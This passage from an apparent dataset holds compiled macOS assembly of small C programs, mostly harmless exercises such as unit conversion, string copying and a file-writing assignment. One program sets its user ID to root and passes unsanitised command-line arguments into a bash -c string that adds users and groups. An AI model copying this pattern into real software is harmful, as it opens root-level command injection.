#16] ; 8-byte Folded Reload sturb wzr, [x29, #-16] mov x9, sp str x8, [x9] adrp x0, l_.str@PAGE add x0, x0, l_.str@PAGEOFF bl _printf ldr x8, [sp, #24] ; 8-byte Folded Reload mov x9, sp str x8, [x9] adrp x0, l_.str.1@PAGE add x0, x0, l_.str.1@PAGEOFF bl _printf ldur x9, [x29, #-8] adrp x8, ___stack_chk_guard@GOTPAGE ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF] ldr x8, [x8] subs x8, x8, x9 cset w8, eq tbnz w8, #0, LBB0_2 b LBB0_1 LBB0_1: bl ___stack_chk_fail LBB0_2: mov w0, #0 ldp x29, x30, [sp, #64] ; 16-byte Folded Reload add sp, sp, #80 ret .cfi_endproc ; -- End function .section __TEXT,__cstring,cstring_literals l___const.main.s2: ; @__const.main.s2 .asciz "Hello" l_.str: ; @.str .asciz "Source string = %s\n" l_.str.1: ; @.str.1 .asciz "Target string = %s\n" .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _main ## -- Begin function main .p2align 4, 0x90 _main: ## @main .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $32, %rsp movq ___stack_chk_guard@GOTPCREL(%rip), %rax movq (%rax), %rax movq %rax, -8(%rbp) movl $0, -24(%rbp) movl L___const.main.s2(%rip), %eax movl %eax, -30(%rbp) movw L___const.main.s2+4(%rip), %ax movw %ax, -26(%rbp) leaq -18(%rbp), %rdi leaq -30(%rbp), %rsi movl $2, %edx movl $10, %ecx callq ___strncpy_chk movb $0, -16(%rbp) leaq -30(%rbp), %rsi leaq L_.str(%rip), %rdi movb $0, %al callq _printf leaq -18(%rbp), %rsi leaq L_.str.1(%rip), %rdi movb $0, %al callq _printf movq ___stack_chk_guard@GOTPCREL(%rip), %rax movq (%rax), %rax movq -8(%rbp), %rcx cmpq %rcx, %rax jne LBB0_2 ## %bb.1: xorl %eax, %eax addq $32, %rsp popq %rbp retq LBB0_2: callq ___stack_chk_fail ud2 .cfi_endproc ## -- End function .section __TEXT,__cstring,cstring_literals L___const.main.s2: ## @__const.main.s2 .asciz "Hello" L_.str: ## @.str .asciz "Source string = %s\n" L_.str.1: ## @.str.1 .asciz "Target string = %s\n" .subsections_via_symbols
the_stack_data/9513957.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .section __TEXT,__literal8,8byte_literals .p2align 3 ; -- Begin function main lCPI0_0: .quad 0x3ffccccccccccccd ; double 1.8 lCPI0_1: .quad 0x4040000000000000 ; double 32 .section __TEXT,__text,regular,pure_instructions .globl _main .p2align 2 _main: ; @main .cfi_startproc ; %bb.0: sub sp, sp, #32 .cfi_def_cfa_offset 32 stp x29, x30, [sp, #16] ; 16-byte Folded Spill add x29, sp, #16 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 mov x9, sp sub x8, x29, #4 str x8, [x9] adrp x0, l_.str@PAGE add x0, x0, l_.str@PAGEOFF bl _scanf ldur s0, [x29, #-4] fcvt d0, s0 adrp x8, lCPI0_1@PAGE ldr d2, [x8, lCPI0_1@PAGEOFF] adrp x8, lCPI0_0@PAGE ldr d1, [x8, lCPI0_0@PAGEOFF] fmadd d0, d0, d1, d2 mov x8, sp str d0, [x8] adrp x0, l_.str.1@PAGE add x0, x0, l_.str.1@PAGEOFF bl _printf mov w0, #0 ldp x29, x30, [sp, #16] ; 16-byte Folded Reload add sp, sp, #32 ret .cfi_endproc ; -- End function .section __TEXT,__cstring,cstring_literals l_.str: ; @.str .asciz "%f" l_.str.1: ; @.str.1 .asciz "Fahrenheit: %f\n" .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .section __TEXT,__literal8,8byte_literals .p2align 3 ## -- Begin function main LCPI0_0: .quad 0x3ffccccccccccccd ## double 1.8 LCPI0_1: .quad 0x4040000000000000 ## double 32 .section __TEXT,__text,regular,pure_instructions .globl _main .p2align 4, 0x90 _main: ## @main .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $16, %rsp leaq L_.str(%rip), %rdi leaq -4(%rbp), %rsi movb $0, %al callq _scanf movss -4(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero cvtss2sd %xmm0, %xmm0 movsd LCPI0_0(%rip), %xmm1 ## xmm1 = mem[0],zero mulsd %xmm1, %xmm0 movsd LCPI0_1(%rip), %xmm1 ## xmm1 = mem[0],zero addsd %xmm1, %xmm0 leaq L_.str.1(%rip), %rdi movb $1, %al callq _printf xorl %eax, %eax addq $16, %rsp popq %rbp retq .cfi_endproc ## -- End function .section __TEXT,__cstring,cstring_literals L_.str: ## @.str .asciz "%f" L_.str.1: ## @.str.1 .asciz "Fahrenheit: %f\n" .subsections_via_symbols
the_stack_data/62636449.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _main ; -- Begin function main .p2align 2 _main: ; @main .cfi_startproc ; %bb.0: sub sp, sp, #80 .cfi_def_cfa_offset 80 stp x29, x30, [sp, #64] ; 16-byte Folded Spill add x29, sp, #64 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 stur wzr, [x29, #-4] stur w0, [x29, #-8] stur x1, [x29, #-16] adrp x0, l_.str@PAGE add x0, x0, l_.str@PAGEOFF mov w1, #1 mov w2, #8 bl _openlog ldur w8, [x29, #-8] subs w8, w8, #3 cset w8, ge tbnz w8, #0, LBB0_2 b LBB0_1 LBB0_1: mov w0, #3 adrp x1, l_.str.1@PAGE add x1, x1, l_.str.1@PAGEOFF bl _syslog$DARWIN_EXTSN mov w0, #1 bl _exit LBB0_2: ldur w8, [x29, #-8] subs w8, w8, #3 cset w8, le tbnz w8, #0, LBB0_4 b LBB0_3 LBB0_3: mov w0, #3 adrp x1, l_.str.2@PAGE add x1, x1, l_.str.2@PAGEOFF bl _syslog$DARWIN_EXTSN mov w0, #1 bl _exit LBB0_4: b LBB0_5 LBB0_5: ldur x8, [x29, #-16] ldr x8, [x8, #8] str x8, [sp, #32] ldur x8, [x29, #-16] ldr x8, [x8, #16] str x8, [sp, #24] ldr x0, [sp, #32] mov w1, #420 bl _creat stur w0, [x29, #-20] ldur w8, [x29, #-20] adds w8, w8, #1 cset w8, ne tbnz w8, #0, LBB0_7 b LBB0_6 LBB0_6: mov w0, #3 adrp x1, l_.str.3@PAGE add x1, x1, l_.str.3@PAGEOFF bl _syslog$DARWIN_EXTSN b LBB0_7 LBB0_7: ldr x0, [sp, #24] bl _strlen mov x8, x0 str w8, [sp, #20] str wzr, [sp, #16] ldur w0, [x29, #-20] ldr x1, [sp, #24] ldrsw x2, [sp, #20] bl _write mov x8, x0 str w8, [sp, #16] ldr w8, [sp, #16] adds w8, w8, #1 cset w8, ne tbnz w8, #0, LBB0_9 b LBB0_8 LBB0_8: mov w0, #3 adrp x1, l_.str.4@PAGE add x1, x1, l_.str.4@PAGEOFF bl _syslog$DARWIN_EXTSN mov w0, #1 bl _exit LBB0_9: ldr w8, [sp, #16] ldr w9, [sp, #20] subs w8, w8, w9 cset w8, eq tbnz w8, #0, LBB0_11 b LBB0_10 LBB0_10: mov w0, #3 adrp x1, l_.str.5@PAGE add x1, x1, l_.str.5@PAGEOFF bl _syslog$DARWIN_EXTSN mov w0, #1 bl _exit LBB0_11: ldr x10, [sp, #24] ldr x8, [sp, #32] mov x9, sp str x10, [x9] str x8, [x9, #8] mov w0, #7 adrp x1, l_.str.6@PAGE add x1, x1, l_.str.6@PAGEOFF bl _syslog$DARWIN_EXTSN ldur w0, [x29, #-20] bl _close adds w8, w0, #1 cset w8, ne tbnz w8, #0, LBB0_13 b LBB0_12 LBB0_12: ldr x8, [sp, #32] mov x9, sp str x8, [x9] mov w0, #3 adrp x1, l_.str.7@PAGE add x1, x1, l_.str.7@PAGEOFF bl _syslog$DARWIN_EXTSN mov w0, #1 bl _exit LBB0_13: bl _closelog mov w0, #0 ldp x29, x30, [sp, #64] ; 16-byte Folded Reload add sp, sp, #80 ret .cfi_endproc ; -- End function .section __TEXT,__cstring,cstring_literals l_.str: ; @.str .asciz "AESD Assignment 2" l_.str.1: ; @.str.1 .asciz "ERROR: Insufficient arguments" l_.str.2: ; @.str.2 .asciz "ERROR: Too many arguments" l_.str.3: ; @.str.3 .asciz "ERROR: File not created" l_.str.4: ; @.str.4 .asciz "ERROR: Writing unsuccessful" l_.str.5: ; @.str.5 .asciz "ERROR: String partially written" l_.str.6: ; @.str.6 .asciz "Writing %s to %s" l_.str.7: ; @.str.7 .asciz "ERROR: Error in closing file %s" .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _main ## -- Begin function main .p2align 4, 0x90 _main: ## @main .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $48, %rsp movl $0, -4(%rbp) movl %edi, -8(%rbp) movq %rsi, -16(%rbp) leaq L_.str(%rip), %rdi movl $1, %esi movl $8, %edx callq _openlog cmpl $3, -8(%rbp) jge LBB0_2 ## %bb.1: leaq L_.str.1(%rip), %rsi xorl %eax, %eax ## kill: def $al killed $al killed $eax movl $3, %edi callq _syslog$DARWIN_EXTSN movl $1, %edi callq _exit LBB0_2: cmpl $3, -8(%rbp) jle LBB0_4 ## %bb.3: leaq L_.str.2(%rip), %rsi xorl %eax, %eax ## kill: def $al killed $al killed $eax movl $3, %edi callq _syslog$DARWIN_EXTSN movl $1, %edi callq _exit LBB0_4: jmp LBB0_5 LBB0_5: movq -16(%rbp), %rax movq 8(%rax), %rax movq %rax, -32(%rbp) movq -16(%rbp), %rax movq 16(%rax), %rax movq %rax, -40(%rbp) movq -32(%rbp), %rdi movl $420, %esi ## imm = 0x1A4 callq _creat movl %eax, -20(%rbp) cmpl $-1, -20(%rbp) jne LBB0_7 ## %bb.6: movl $3, %edi leaq L_.str.3(%rip), %rsi movb $0, %al callq _syslog$DARWIN_EXTSN LBB0_7: movq -40(%rbp), %rdi callq _strlen ## kill: def $eax killed $eax killed $rax movl %eax, -44(%rbp) movl $0, -48(%rbp) movl -20(%rbp), %edi movq -40(%rbp), %rsi movslq -44(%rbp), %rdx callq _write ## kill: def $eax killed $eax killed $rax movl %eax, -48(%rbp) cmpl $-1, -48(%rbp) jne LBB0_9 ## %bb.8: leaq L_.str.4(%rip), %rsi xorl %eax, %eax ## kill: def $al killed $al killed $eax movl $3, %edi callq _syslog$DARWIN_EXTSN movl $1, %edi callq _exit LBB0_9: movl -48(%rbp), %eax cmpl -44(%rbp), %eax je LBB0_11 ## %bb.10: leaq L_.str.5(%rip), %rsi xorl %eax, %eax ## kill: def $al killed $al killed $eax movl $3, %edi callq _syslog$DARWIN_EXTSN movl $1, %edi callq _exit LBB0_11: movq -40(%rbp), %rdx movq -32(%rbp), %rcx movl $7, %edi leaq L_.str.6(%rip), %rsi movb $0, %al callq _syslog$DARWIN_EXTSN movl -20(%rbp), %edi callq _close cmpl $-1, %eax jne LBB0_13 ## %bb.12: movq -32(%rbp), %rdx leaq L_.str.7(%rip), %rsi xorl %eax, %eax ## kill: def $al killed $al killed $eax movl $3, %edi callq _syslog$DARWIN_EXTSN movl $1, %edi callq _exit LBB0_13: callq _closelog xorl %eax, %eax addq $48, %rsp popq %rbp retq .cfi_endproc ## -- End function .section __TEXT,__cstring,cstring_literals L_.str: ## @.str .asciz "AESD Assignment 2" L_.str.1: ## @.str.1 .asciz "ERROR: Insufficient arguments" L_.str.2: ## @.str.2 .asciz "ERROR: Too many arguments" L_.str.3: ## @.str.3 .asciz "ERROR: File not created" L_.str.4: ## @.str.4 .asciz "ERROR: Writing unsuccessful" L_.str.5: ## @.str.5 .asciz "ERROR: String partially written" L_.str.6: ## @.str.6 .asciz "Writing %s to %s" L_.str.7: ## @.str.7 .asciz "ERROR: Error in closing file %s" .subsections_via_symbols
the_stack_data/237642240.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .subsections_via_symbols
the_stack_data/11459.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _main ; -- Begin function main .p2align 2 _main: ; @main .cfi_startproc ; %bb.0: sub sp, sp, #80 .cfi_def_cfa_offset 80 stp x29, x30, [sp, #64] ; 16-byte Folded Spill add x29, sp, #64 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 adrp x8, ___stack_chk_guard@GOTPAGE ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF] ldr x8, [x8] stur x8, [x29, #-8] str wzr, [sp, #16] add x0, sp, #21 adrp x1, l___const.main.msg@PAGE add x1, x1, l___const.main.msg@PAGEOFF mov x2, #35 bl _memcpy mov x9, sp add x8, sp, #12 str x8, [x9] adrp x0, l_.str@PAGE add x0, x0, l_.str@PAGEOFF bl _scanf str wzr, [sp, #8] b LBB0_1 LBB0_1: ; =>This Inner Loop Header: Depth=1 ldr w8, [sp, #8] ldr w9, [sp, #12] subs w8, w8, w9 cset w8, ge tbnz w8, #0, LBB0_4 b LBB0_2 LBB0_2: ; in Loop: Header=BB0_1 Depth=1 ldrsw x9, [sp, #8] add x8, sp, #21 ldrsb w10, [x8, x9] mov x9, sp ; implicit-def: $x8 mov x8, x10 str x8, [x9] adrp x0, l_.str.1@PAGE add x0, x0, l_.str.1@PAGEOFF bl _printf b LBB0_3 LBB0_3: ; in Loop: Header=BB0_1 Depth=1 ldr w8, [sp, #8] add w8, w8, #1 str w8, [sp, #8] b LBB0_1 LBB0_4: adrp x0, l_.str.2@PAGE add x0, x0, l_.str.2@PAGEOFF bl _printf ldur x9, [x29, #-8] adrp x8, ___stack_chk_guard@GOTPAGE ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF] ldr x8, [x8] subs x8, x8, x9 cset w8, eq tbnz w8, #0, LBB0_6 b LBB0_5 LBB0_5: bl ___stack_chk_fail LBB0_6: mov w0, #0 ldp x29, x30, [sp, #64] ; 16-byte Folded Reload add sp, sp, #80 ret .cfi_endproc ; -- End function .section __TEXT,__cstring,cstring_literals l___const.main.msg: ; @__const.main.msg .asciz "LIFE IS NOT A PROBLEM TO BE SOLVED" l_.str: ; @.str .asciz "%d" l_.str.1: ; @.str.1 .asciz "%c" l_.str.2: ; @.str.2 .asciz "\n" .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _main ## -- Begin function main .p2align 4, 0x90 _main: ## @main .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $64, %rsp movq ___stack_chk_guard@GOTPCREL(%rip), %rax movq (%rax), %rax movq %rax, -8(%rbp) movl $0, -52(%rbp) leaq -48(%rbp), %rdi leaq L___const.main.msg(%rip), %rsi movl $35, %edx callq _memcpy leaq L_.str(%rip), %rdi leaq -56(%rbp), %rsi movb $0, %al callq _scanf movl $0, -60(%rbp) LBB0_1: ## =>This Inner Loop Header: Depth=1 movl -60(%rbp), %eax cmpl -56(%rbp), %eax jge LBB0_4 ## %bb.2: ## in Loop: Header=BB0_1 Depth=1 movslq -60(%rbp), %rax movsbl -48(%rbp,%rax), %esi leaq L_.str.1(%rip), %rdi movb $0, %al callq _printf ## %bb.3: ## in Loop: Header=BB0_1 Depth=1 movl -60(%rbp), %eax addl $1, %eax movl %eax, -60(%rbp) jmp LBB0_1 LBB0_4: leaq L_.str.2(%rip), %rdi movb $0, %al callq _printf movq ___stack_chk_guard@GOTPCREL(%rip), %rax movq (%rax), %rax movq -8(%rbp), %rcx cmpq %rcx, %rax jne LBB0_6 ## %bb.5: xorl %eax, %eax addq $64, %rsp popq %rbp retq LBB0_6: callq ___stack_chk_fail ud2 .cfi_endproc ## -- End function .section __TEXT,__cstring,cstring_literals .p2align 4 ## @__const.main.msg L___const.main.msg: .asciz "LIFE IS NOT A PROBLEM TO BE SOLVED" L_.str: ## @.str .asciz "%d" L_.str.1: ## @.str.1 .asciz "%c" L_.str.2: ## @.str.2 .asciz "\n" .subsections_via_symbols
the_stack_data/39405.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _main ; -- Begin function main .p2align 2 _main: ; @main .cfi_startproc ; %bb.0: sub sp, sp, #464 .cfi_def_cfa_offset 464 stp x28, x27, [sp, #432] ; 16-byte Folded Spill stp x29, x30, [sp, #448] ; 16-byte Folded Spill add x29, sp, #448 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 .cfi_offset w27, -24 .cfi_offset w28, -32 adrp x8, ___stack_chk_guard@GOTPAGE ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF] ldr x8, [x8] stur x8, [x29, #-24] str wzr, [sp, #164] str w0, [sp, #160] str x1, [sp, #152] ldr w8, [sp, #160] subs w8, w8, #6 cset w8, eq tbnz w8, #0, LBB0_2 b LBB0_1 LBB0_1: ldr x8, [sp, #152] ldr x8, [x8] mov x9, sp str x8, [x9] adrp x0, l_.str@PAGE add x0, x0, l_.str@PAGEOFF bl _printf mov w8, #1 str w8, [sp, #164] b LBB0_3 LBB0_2: ldr x8, [sp, #152] ldr x8, [x8, #32] str x8, [sp, #144] ldr x8, [sp, #152] ldr x8, [x8, #24] str x8, [sp, #136] ldr x8, [sp, #152] ldr x8, [x8, #16] str x8, [sp, #128] ldr x8, [sp, #152] ldr x8, [x8, #8] str x8, [sp, #120] ldr x8, [sp, #152] ldr x8, [x8, #40] str x8, [sp, #112] adrp x8, l_.str.1@PAGE add x8, x8, l_.str.1@PAGEOFF str x8, [sp, #104] ldr x3, [sp, #104] ldr x17, [sp, #136] ldr x16, [sp, #144] ldr x15, [sp, #136] ldr x14, [sp, #120] ldr x13, [sp, #128] ldr x12, [sp, #144] ldr x11, [sp, #112] ldr x10, [sp, #120] ldr x8, [sp, #120] mov x9, sp str x9, [sp, #80] ; 8-byte Folded Spill str x17, [x9] str x16, [x9, #8] str x15, [x9, #16] str x14, [x9, #24] str x13, [x9, #32] str x12, [x9, #40] str x11, [x9, #48] str x10, [x9, #56] str x8, [x9, #64] add x0, sp, #169 str x0, [sp, #96] ; 8-byte Folded Spill mov w1, #0 str w1, [sp, #92] ; 4-byte Folded Spill mov x2, #255 bl ___sprintf_chk ldr w0, [sp, #92] ; 4-byte Folded Reload bl _setuid ldr x9, [sp, #96] ; 8-byte Folded Reload mov x8, sp adrp x10, l_.str.4@PAGE add x10, x10, l_.str.4@PAGEOFF str x10, [x8] str x9, [x8, #8] ; kill: def $x9 killed $xzr str xzr, [x8, #16] str xzr, [x8, #24] adrp x0, l_.str.2@PAGE add x0, x0, l_.str.2@PAGEOFF adrp x1, l_.str.3@PAGE add x1, x1, l_.str.3@PAGEOFF bl _execle str w0, [sp, #164] b LBB0_3 LBB0_3: ldr w8, [sp, #164] str w8, [sp, #76] ; 4-byte Folded Spill ldur x9, [x29, #-24] adrp x8, ___stack_chk_guard@GOTPAGE ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF] ldr x8, [x8] subs x8, x8, x9 cset w8, eq tbnz w8, #0, LBB0_5 b LBB0_4 LBB0_4: bl ___stack_chk_fail LBB0_5: ldr w0, [sp, #76] ; 4-byte Folded Reload ldp x29, x30, [sp, #448] ; 16-byte Folded Reload ldp x28, x27, [sp, #432] ; 16-byte Folded Reload add sp, sp, #464 ret .cfi_endproc ; -- End function .section __TEXT,__cstring,cstring_literals l_.str: ; @.str .asciz "Usage: %s <un> <uid> <gn> <gui> <home>\n" l_.str.1: ; @.str.1 .asciz "grep -q '^%s' /etc/group || /usr/sbin/groupadd -g %s %s;grep -q '^%s' /etc/passwd || /usr/sbin/useradd -u %s -g %s -d %s %s;" l_.str.2: ; @.str.2 .asciz "/bin/bash" l_.str.3: ; @.str.3 .asciz "bash" l_.str.4: ; @.str.4 .asciz "-c" .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _main ## -- Begin function main .p2align 4, 0x90 _main: ## @main .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp pushq %r15 pushq %r14 pushq %r12 pushq %rbx subq $400, %rsp ## imm = 0x190 .cfi_offset %rbx, -48 .cfi_offset %r12, -40 .cfi_offset %r14, -32 .cfi_offset %r15, -24 movq ___stack_chk_guard@GOTPCREL(%rip), %rax movq (%rax), %rax movq %rax, -40(%rbp) movl $0, -308(%rbp) movl %edi, -312(%rbp) movq %rsi, -320(%rbp) cmpl $6, -312(%rbp) je LBB0_2 ## %bb.1: movq -320(%rbp), %rax movq (%rax), %rsi leaq L_.str(%rip), %rdi movb $0, %al callq _printf movl $1, -308(%rbp) jmp LBB0_3 LBB0_2: movq -320(%rbp), %rax movq 32(%rax), %rax movq %rax, -328(%rbp) movq -320(%rbp), %rax movq 24(%rax), %rax movq %rax, -336(%rbp) movq -320(%rbp), %rax movq 16(%rax), %rax movq %rax, -344(%rbp) movq -320(%rbp), %rax movq 8(%rax), %rax movq %rax, -352(%rbp) movq -320(%rbp), %rax movq 40(%rax), %rax movq %rax, -360(%rbp) leaq L_.str.1(%rip), %rax movq %rax, -368(%rbp) leaq -304(%rbp), %rdi movq -368(%rbp), %rcx movq -336(%rbp), %r8 movq -328(%rbp), %r9 movq -336(%rbp), %r12 movq -352(%rbp), %r15 movq -344(%rbp), %r14 movq -328(%rbp), %rbx movq -360(%rbp), %r11 movq -352(%rbp), %r10 movq -352(%rbp), %rax xorl %esi, %esi movl $255, %edx movq %r12, (%rsp) movq %r15, 8(%rsp) movq %r14, 16(%rsp) movq %rbx, 24(%rsp) movq %r11, 32(%rsp) movq %r10, 40(%rsp) movq %rax, 48(%rsp) movb $0, %al callq ___sprintf_chk xorl %edi, %edi callq _setuid leaq -304(%rbp), %rcx leaq L_.str.2(%rip), %rdi leaq L_.str.3(%rip), %rsi leaq L_.str.4(%rip), %rdx xorl %eax, %eax movl %eax, %r9d movq %r9, %r8 movb $0, %al callq _execle movl %eax, -308(%rbp) LBB0_3: movl -308(%rbp), %eax movl %eax, -372(%rbp) ## 4-byte Spill movq ___stack_chk_guard@GOTPCREL(%rip), %rax movq (%rax), %rax movq -40(%rbp), %rcx cmpq %rcx, %rax jne LBB0_5 ## %bb.4: movl -372(%rbp), %eax ## 4-byte Reload addq $400, %rsp ## imm = 0x190 popq %rbx popq %r12 popq %r14 popq %r15 popq %rbp retq LBB0_5: callq ___stack_chk_fail ud2 .cfi_endproc ## -- End function .section __TEXT,__cstring,cstring_literals L_.str: ## @.str .asciz "Usage: %s <un> <uid> <gn> <gui> <home>\n" L_.str.1: ## @.str.1 .asciz "grep -q '^%s' /etc/group || /usr/sbin/groupadd -g %s %s;grep -q '^%s' /etc/passwd || /usr/sbin/useradd -u %s -g %s -d %s %s;" L_.str.2: ## @.str.2 .asciz "/bin/bash" L_.str.3: ## @.str.3 .asciz "bash" L_.str.4: ## @.str.4 .asciz "-c" .subsections_via_symbols
the_stack_data/14199509.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _main ; -- Begin function main .p2align 2 _main: ; @main .cfi_startproc ; %bb.0: sub sp, sp, #80 .cfi_def_cfa_offset 80 stp x29, x30, [sp, #64] ; 16-byte Folded Spill add x29, sp, #64 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 mov w8, #0 str w8, [sp, #32] ; 4-byte Folded Spill stur wzr, [x29, #-4] adrp x0, l_.str@PAGE add x0, x0, l_.str@PAGEOFF bl _printf mov x9, sp sub x8, x29, #8 str x8, [x9] adrp x0, l_.str.1@PAGE add x0, x0, l_.str.1@PAGEOFF str x0, [sp, #24] ; 8-byte Folded Spill bl _scanf adrp x0, l_.str.2@PAGE add x0, x0, l_.str.2@PAGEOFF bl _printf ldr x0, [sp, #24] ; 8-byte Folded Reload mov x9, sp sub x8, x29, #12 str x8, [x9] bl _scanf adrp x0, l_.str.3@PAGE add x0, x0, l_.str.3@PAGEOFF bl _printf ldr x0, [sp, #24] ; 8-byte Folded Reload mov x9, sp sub x8, x29, #16 str x8, [x9] bl _scanf adrp x0, l_.str.4@PAGE add x0, x0, l_.str.4@PAGEOFF bl _printf ldr x0, [sp, #24] ; 8-byte Folded Reload mov x9, sp sub x8, x29, #20 str x8, [x9] bl _scanf ldur s0, [x29, #-8] ldur s1, [x29, #-16] fadd s0, s0, s1 stur s0, [x29, #-24] ldur s0, [x29, #-8] ldur s1, [x29, #-12] ldur s2, [x29, #-16] ldur s3, [x29, #-20] fmul s2, s2, s3 fmadd s0, s0, s1, s2 ldur s1, [x29, #-24] fdiv s0, s0, s1 stur s0, [x29, #-28] ldur s0, [x29, #-24] fcvt d1, s0 ldur s0, [x29, #-28] fcvt d0, s0 mov x8, sp str d1, [x8] str d0, [x8, #8] adrp x0, l_.str.5@PAGE add x0, x0, l_.str.5@PAGEOFF bl _printf ldr w0, [sp, #32] ; 4-byte Folded Reload ldp x29, x30, [sp, #64] ; 16-byte Folded Reload add sp, sp, #80 ret .cfi_endproc ; -- End function .section __TEXT,__cstring,cstring_literals l_.str: ; @.str .asciz "\320\236\320\261\321\212\320\265\320\274 \320\277\320\265\321\200\320\262\320\276\320\271 \320\266\320\270\320\264\320\272\320\276\321\201\321\202\320\270: " l_.str.1: ; @.str.1 .asciz "%f" l_.str.2: ; @.str.2 .asciz "\320\242\320\265\320\274\320\277\320\265\321\200\320\260\321\202\321\203\321\200\320\260 \320\277\320\265\321\200\320\262\320\276\320\271 \320\266\320\270\320\264\320\272\320\276\321\201\321\202\320\270: " l_.str.3: ; @.str.3 .asciz "\320\236\320\261\321\212\320\265\320\274 \320\262\321\202\320\276\321\200\320\276\320\271 \320\266\320\270\320\264\320\272\320\276\321\201\321\202\320\270: " l_.str.4: ; @.str.4 .asciz "\320\242\320\265\320\274\320\277\320\265\321\200\320\260\321\202\321\203\321\200\320\260 \320\262\321\202\320\276\321\200\320\276\320\271 \320\266\320\270\320\264\320\272\320\276\321\201\321\202\320\270: " l_.str.5: ; @.str.5 .asciz "\320\236\320\261\321\212\320\265\320\274 = %.5f\n\320\242\320\265\320\274\320\277\320\265\321\200\320\260\321\202\321\203\321\200\320\260 = %.5f" .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _main ## -- Begin function main .p2align 4, 0x90 _main: ## @main .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $32, %rsp movl $0, -4(%rbp) leaq L_.str(%rip), %rdi movb $0, %al callq _printf leaq L_.str.1(%rip), %rdi leaq -8(%rbp), %rsi movb $0, %al callq _scanf leaq L_.str.2(%rip), %rdi movb $0, %al callq _printf leaq L_.str.1(%rip), %rdi leaq -12(%rbp), %rsi movb $0, %al callq _scanf leaq L_.str.3(%rip), %rdi movb $0, %al callq _printf leaq L_.str.1(%rip), %rdi leaq -16(%rbp), %rsi movb $0, %al callq _scanf leaq L_.str.4(%rip), %rdi movb $0, %al callq _printf leaq L_.str.1(%rip), %rdi leaq -20(%rbp), %rsi movb $0, %al callq _scanf movss -8(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero addss -16(%rbp), %xmm0 movss %xmm0, -24(%rbp) movss -8(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero movss -12(%rbp), %xmm2 ## xmm2 = mem[0],zero,zero,zero movss -16(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero mulss -20(%rbp), %xmm1 mulss %xmm2, %xmm0 addss %xmm1, %xmm0 divss -24(%rbp), %xmm0 movss %xmm0, -28(%rbp) movss -24(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero cvtss2sd %xmm0, %xmm0 movss -28(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero cvtss2sd %xmm1, %xmm1 leaq L_.str.5(%rip), %rdi movb $2, %al callq _printf xorl %eax, %eax addq $32, %rsp popq %rbp retq .cfi_endproc ## -- End function .section __TEXT,__cstring,cstring_literals L_.str: ## @.str .asciz "\320\236\320\261\321\212\320\265\320\274 \320\277\320\265\321\200\320\262\320\276\320\271 \320\266\320\270\320\264\320\272\320\276\321\201\321\202\320\270: " L_.str.1: ## @.str.1 .asciz "%f" L_.str.2: ## @.str.2 .asciz "\320\242\320\265\320\274\320\277\320\265\321\200\320\260\321\202\321\203\321\200\320\260 \320\277\320\265\321\200\320\262\320\276\320\271 \320\266\320\270\320\264\320\272\320\276\321\201\321\202\320\270: " L_.str.3: ## @.str.3 .asciz "\320\236\320\261\321\212\320\265\320\274 \320\262\321\202\320\276\321\200\320\276\320\271 \320\266\320\270\320\264\320\272\320\276\321\201\321\202\320\270: " L_.str.4: ## @.str.4 .asciz "\320\242\320\265\320\274\320\277\320\265\321\200\320\260\321\202\321\203\321\200\320\260 \320\262\321\202\320\276\321\200\320\276\320\271 \320\266\320\270\320\264\320\272\320\276\321\201\321\202\320\270: " L_.str.5: ## @.str.5 .asciz 